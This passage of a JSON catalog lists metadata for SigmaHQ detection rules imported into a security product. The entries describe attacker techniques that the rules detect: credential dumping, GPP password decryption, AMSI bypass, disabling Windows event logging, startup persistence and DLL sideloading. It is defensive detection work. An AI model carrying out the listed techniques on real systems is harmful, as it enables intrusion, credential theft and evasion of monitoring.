Attackers can abuse this functionality to establish a C2 channel", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001", "T1219" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/visual-studio-code-tunnel-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "90d6bd71-dffb-4989-8d86-a827fedd6624", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_vscode_tunnel_execution.yml" } }, { "id": "sigmahq-sigma-90dcf730-1b71-4ae7-9ffc-6fcf62bd0132", "type": "detection", "name": "Suspicious ZipExec Execution", "description": "ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-zipexec-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "90dcf730-1b71-4ae7-9ffc-6fcf62bd0132", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_zipexec.yml" } }, { "id": 
"sigmahq-sigma-90f138c1-f578-4ac3-8c49-eecfd847c8b7", "type": "detection", "name": "BITS Transfer Job Download From Direct IP", "description": "Detects a BITS transfer job downloading file(s) from a direct IP address.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1197" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bits-transfer-job-download-from-direct-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "90f138c1-f578-4ac3-8c49-eecfd847c8b7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/bits_client/win_bits_client_new_transfer_via_ip_address.yml" } }, { "id": "sigmahq-sigma-90f342e1-1aaa-4e43-b092-39fda57ed11e", "type": "detection", "name": "ETW Logging Disabled For rpcrt4.dll", "description": "Detects changes to the \"ExtErrorInformation\" key in order to disable ETW logging for rpcrt4.dll", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/etw-logging-disabled-for-rpcrt4-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "90f342e1-1aaa-4e43-b092-39fda57ed11e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": 
"2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_rpcrt4_etw_tamper.yml" } }, { "id": "sigmahq-sigma-90fb5e62-ca1f-4e22-b42e-cc521874c938", "type": "detection", "name": "Suspicious Shells Spawn by Java Utility Keytool", "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-shells-spawn-by-java-utility-keytool.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "90fb5e62-ca1f-4e22-b42e-cc521874c938", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_java_keytool_susp_child_process.yml" } }, { "id": "sigmahq-sigma-910ab938-668b-401b-b08c-b596e80fdca5", "type": "detection", "name": "Transferring Files with Credential Data via Network Shares", "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.002", "T1003.001", "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/transferring-files-with-credential-data-via-network-shares.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", 
"provenance": { "source": "SigmaHQ/sigma", "source_id": "910ab938-668b-401b-b08c-b596e80fdca5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_transf_files_with_cred_data_via_network_shares.yml" } }, { "id": "sigmahq-sigma-91109523-17f0-4248-a800-f81d9e7c081d", "type": "detection", "name": "PowerShell WMI Win32_Product Install MSI", "description": "Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-wmi-win32-product-install-msi.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "91109523-17f0-4248-a800-f81d9e7c081d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_win32_product_install_msi.yml" } }, { "id": "sigmahq-sigma-91174a41-dc8f-401b-be89-7bfc140612a0", "type": "detection", "name": "Office Macro File Creation", "description": "Detects the creation of new Office macro files on the system", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/office-macro-file-creation.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "91174a41-dc8f-401b-be89-7bfc140612a0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_office_macro_files_created.yml" } }, { "id": "sigmahq-sigma-91239011-fe3c-4b54-9f24-15c86bb65913", "type": "detection", "name": "Office Macros Warning Disabled", "description": "Detects registry changes to Microsoft Office \"VBAWarning\" to a value of \"1\" which enables the execution of all macros, whether signed or unsigned.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/office-macros-warning-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "91239011-fe3c-4b54-9f24-15c86bb65913", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_office_vba_warnings_tamper.yml" } }, { "id": "sigmahq-sigma-91903aba-1088-42ee-b680-d6d94fe002b0", "type": "detection", "name": "Windows Defender Submit Sample Feature Disabled", "description": "Detects disabling of the \"Automatic Sample Submission\" feature of Windows Defender.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, 
"verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/windows-defender-submit-sample-feature-disabled.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "91903aba-1088-42ee-b680-d6d94fe002b0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/windefend/win_defender_config_change_sample_submission_consent.yml" } }, { "id": "sigmahq-sigma-919f2ef0-be2d-4a7a-b635-eb2b41fde044", "type": "detection", "name": "Disable Security Events Logging Adding Reg Key MiniNt", "description": "Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stop writing events.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.001", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-security-events-logging-adding-reg-key-minint.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml" } }, { "id": "sigmahq-sigma-91a2c315-9ee6-4052-a853-6f6a8238f90d", "type": "detection", "name": "Findstr GPP Passwords", "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. 
This value can be decrypted with gpp-decrypt.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1552.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/findstr-gpp-passwords.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "91a2c315-9ee6-4052-a853-6f6a8238f90d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords.yml" } }, { "id": "sigmahq-sigma-91b76b84-8589-47aa-9605-c837583b82a9", "type": "detection", "name": "Potential Okta Password in AlternateID Field", "description": "Detects when a user has potentially entered their password into the\nusername field, which will cause the password to be retained in log files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1552" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-okta-password-in-alternateid-field.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "91b76b84-8589-47aa-9605-c837583b82a9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_password_in_alternateid_field.yml" } }, { "id": 
"sigmahq-sigma-91c49341-e2ef-40c0-ac45-49ec5c3fe26c", "type": "detection", "name": "RTCore Suspicious Service Installation", "description": "Detects the installation of the RTCore service, which could indicate abuse of the vulnerable Micro-Star MSI Afterburner driver", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rtcore-suspicious-service-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_susp_rtcore64_service_install.yml" } }, { "id": "sigmahq-sigma-91c945bc-2ad1-4799-a591-4d00198a1215", "type": "detection", "name": "Suspicious Access to Sensitive File Extensions", "description": "Detects known sensitive file extensions accessed on a network share", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1039" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-access-to-sensitive-file-extensions.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "91c945bc-2ad1-4799-a591-4d00198a1215", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_raccess_sensitive_fext.yml" } }, { "id": "sigmahq-sigma-91c95675-1f27-46d0-bead-d1ae96b97cd3", "type": "detection", "name": "User Added To Group With CA Policy Modification Access", "description": "Monitor and alert on group membership additions of groups that have CA policy modification access", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548", "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-added-to-group-with-ca-policy-modification-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "91c95675-1f27-46d0-bead-d1ae96b97cd3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_group_user_addition_ca_modification.yml" } }, { "id": "sigmahq-sigma-91e69562-2426-42ce-a647-711b8152ced6", "type": "detection", "name": "AADInternals PowerShell Cmdlets Execution - PsScript", "description": "Detects AADInternals Cmdlet execution. A tool for administering Azure AD and Office 365. 
Which can be abused by threat actors to attack Azure AD or Office 365.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aadinternals-powershell-cmdlets-execution-psscript.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "91e69562-2426-42ce-a647-711b8152ced6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_aadinternals_cmdlets_execution.yml" } }, { "id": "sigmahq-sigma-91edcfb1-2529-4ac2-9ecc-7617f895c7e4", "type": "detection", "name": "Weak or Abused Passwords In CLI", "description": "Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI.\nAn example would be a threat actor creating a new user via the net command and providing the password inline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/weak-or-abused-passwords-in-cli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "91edcfb1-2529-4ac2-9ecc-7617f895c7e4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_susp_weak_or_abused_passwords.yml" } }, { "id": "sigmahq-sigma-9212f354-7775-4e28-9c9f-8f0a4544e664", "type": "detection", "name": "Active Directory Database Snapshot Via ADExplorer", "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data for social engineering. The snapshot doesn't contain password hashes but there have been cases, where administrators put passwords in the comment field.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002", "T1069.002", "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/active-directory-database-snapshot-via-adexplorer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9212f354-7775-4e28-9c9f-8f0a4544e664", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_adexplorer_execution.yml" } }, { "id": "sigmahq-sigma-921aa10f-2e74-4cca-9498-98f9ca4d6fdf", "type": "detection", "name": "Registry Modification Attempt Via VBScript", "description": "Detects attempts to modify the registry using VBScript's CreateObject(\"Wscript.shell\") and RegWrite methods via common LOLBINs.\nIt could be an attempt to modify the registry for persistence without using straightforward methods like regedit.exe, reg.exe, or PowerShell.\nThreat Actors may use this technique to evade 
detection by security solutions that monitor for direct registry modifications through traditional tools.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1059.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/registry-modification-attempt-via-vbscript.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "921aa10f-2e74-4cca-9498-98f9ca4d6fdf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_vbscript_registry_modification.yml" } }, { "id": "sigmahq-sigma-9248c7e1-2bf3-4661-a22c-600a8040b446", "type": "detection", "name": "Potential Rundll32 Execution With DLL Stored In ADS", "description": "Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-rundll32-execution-with-dll-stored-in-ads.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9248c7e1-2bf3-4661-a22c-600a8040b446", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_rundll32_ads_stored_dll_execution.yml" } }, { "id": "sigmahq-sigma-9257c05b-4a4a-48e5-a670-b7b073cf401b", "type": "detection", "name": "Binary Proxy Execution Via Dotnet-Trace.EXE", "description": "Detects commandline arguments for executing a child process via dotnet-trace.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/binary-proxy-execution-via-dotnet-trace-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9257c05b-4a4a-48e5-a670-b7b073cf401b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dotnet_trace_lolbin_execution.yml" } }, { "id": "sigmahq-sigma-92626ddd-662c-49e3-ac59-f6535f12d189", "type": "detection", "name": "Scheduled Task Creation Via Schtasks.EXE", "description": "Detects the creation of scheduled tasks by user accounts via the \"schtasks\" utility.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/scheduled-task-creation-via-schtasks-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "92626ddd-662c-49e3-ac59-f6535f12d189", "source_commit": 
"df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_creation.yml" } }, { "id": "sigmahq-sigma-92772523-d9c1-4c93-9547-b0ca500baba3", "type": "detection", "name": "Potential Persistence Via Mpnotify", "description": "Detects when an attacker registers a new SIP provider for persistence and defense evasion", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-mpnotify.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "92772523-d9c1-4c93-9547-b0ca500baba3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_mpnotify.yml" } }, { "id": "sigmahq-sigma-9292293b-8496-4715-9db6-37028dcda4b3", "type": "detection", "name": "Replace.exe Usage", "description": "Detects the use of Replace.exe, which can be used to replace a file with another file", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/replace-exe-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"9292293b-8496-4715-9db6-37028dcda4b3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_replace.yml" } }, { "id": "sigmahq-sigma-92a974db-ab84-457f-9ec0-55db83d7a825", "type": "detection", "name": "Potential AMSI Bypass Using NULL Bits", "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-amsi-bypass-using-null-bits.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "92a974db-ab84-457f-9ec0-55db83d7a825", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_amsi_null_bits_bypass.yml" } }, { "id": "sigmahq-sigma-92cc3e5d-eb57-419d-8c16-5c63f325a401", "type": "detection", "name": "Azure Suppression Rule Created", "description": "Identifies when a suppression rule is created in Azure. 
Adversaries could attempt this to evade detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-suppression-rule-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "92cc3e5d-eb57-419d-8c16-5c63f325a401", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_suppression_rule_created.yml" } }, { "id": "sigmahq-sigma-92dae1ed-1c9d-4eff-a567-33acbd95b00e", "type": "detection", "name": "Possible Impacket SecretDump Remote Activity - Zeek", "description": "Detect AD credential dumping using impacket secretdump HKTL. 
Based on the SIGMA rules/windows/builtin/win_impacket_secretdump.yml", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.002", "T1003.004", "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/possible-impacket-secretdump-remote-activity-zeek.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "92dae1ed-1c9d-4eff-a567-33acbd95b00e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_smb_converted_win_impacket_secretdump.yml" } }, { "id": "sigmahq-sigma-92f84194-8d9a-4ee0-8699-c30bfac59780", "type": "detection", "name": "AWS Key Pair Import Activity", "description": "Detects the import of SSH key pairs into AWS EC2, which may indicate an attacker attempting to gain unauthorized access to instances. 
This activity could lead to initial access, persistence, or privilege escalation, potentially compromising sensitive data and operations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-key-pair-import-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "92f84194-8d9a-4ee0-8699-c30bfac59780", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_ec2_import_key_pair_activity.yml" } }, { "id": "sigmahq-sigma-92fa78e7-4d39-45f1-91a3-8b23f3f1088d", "type": "detection", "name": "Potential Startup Shortcut Persistence Via PowerShell.EXE", "description": "Detects PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 
2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-startup-shortcut-persistence-via-powershell-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_powershell_startup_shortcuts.yml" } }, { "id": "sigmahq-sigma-9313dc13-d04c-46d8-af4a-a930cc55d93b", "type": "detection", "name": "Potential DLL Sideloading Via VMware Xfer", "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dll-sideloading-via-vmware-xfer.yaml", 